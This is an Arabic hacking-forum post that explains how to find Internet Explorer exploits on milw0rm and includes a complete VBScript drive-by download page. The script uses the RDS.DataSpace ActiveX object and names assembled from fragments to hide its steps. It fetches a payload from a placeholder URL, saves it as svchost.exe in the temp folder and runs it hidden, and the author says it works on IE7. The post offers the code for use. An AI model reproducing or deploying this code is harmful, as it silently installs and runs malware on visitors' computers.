بسم الله الرحمن الرحيم
ا
( كفيت جالب ثغرات المتصفح من مواقع السكيروتي )
وانا شرحت له كيف في موضوع لكن انا عملت الموضوع هذا حتى الكل يعرف كيف
-----------------------------------------------------------------------------
اول شي ندخل الى رابط التالي
milw0rm - exploits : vulnerabilities : videos : papers : shellcode
ونكتب في فارغ البحث
( Internet Explorer )
اوك الحين رح تطلع لنه جميع الثغرات الموجوده في وطبعن في عنا انواع الستغلال ثغرت
منه عن طريق رابط سيرفر ومنه عن طريق شل كود
مثل على ثغرة لي تتطلب منا شل كود
MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) (fast)
ومثل لتي تطلب منا رابط سيرفر
كود PHP:
كود:
<html>
<title></title>
<script language=VBScript>
on error resume next
dl=هنــا الباتش المباشر
j1=clsid:
j2=BD96C556-
j3=65A3-
j4=11D0-
j5=983A-
j6=00C04FC29E36
j7=j1&j2&j3&j4&j5&j6
xx=object
xxx=classid
xxxx=Scripting.FileSystemObject
dd=open
Set df = document.createElement(xx)
df.setAttribute xxx, j7
b4=Mi
b5=cr
b6=o
b7=soft
b8=.X
b9=M
b10=L
b11=H
b12=T
b13=T
b14=P
strb1=b4&b5&b6&b7&b8&b9
strb2=b10&b11&b12&b13&b14
strb=strb1&strb2
Set x = df.CreateObject(strb,)
a4=A
a5=d
a6=o
a7=d
a8=b
a9=.
a10=S
a11=t
a12=r
a13=e
a14=a
a15=m
strd1=a4&a5&a6&a7&a8&a9
strd2=a10&a11&a12&a13&a14&a15
strd=strd1&strd2
set SS = df.createobject(strd,)
SS.type = 1
f4=G
f5=E
f6=T
stre=f4&f5&f6
x.Open stre, dl, False
x.Send
marco1=svchost.exe
set F = df.createobject(xxxx,)
tmp2=2
set tmp = F.GetSpecialFolder(tmp2)
SS.open
marco1= F.BuildPath(tmp,marco1)
SS.write x.responseBody
SS.savetofile marco1,2
SS.close
z1=She
z2=ll.A
z3=ppli
z4=cat
z5=io
z6=n
zz=z1&z2&z3&z4&z5&z6
set Q = df.createobject(zz,)
Q.ShellExecute marco1,,,dd,0
</script>
<head>
<title></title>
</head><body>
</body></html>
ومثل لتي يكون استغلال عن طريق لغة بيثون
MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) (py)
وهي تكون في بدية #!/usr/bin/env python
=================================
اخوكم بالله
hellwaheeb
ملاحظة : ثغرة لي انا حطه شغاله على 7
================================
اضن كل شي واضح واي استفسار انا تحت امركم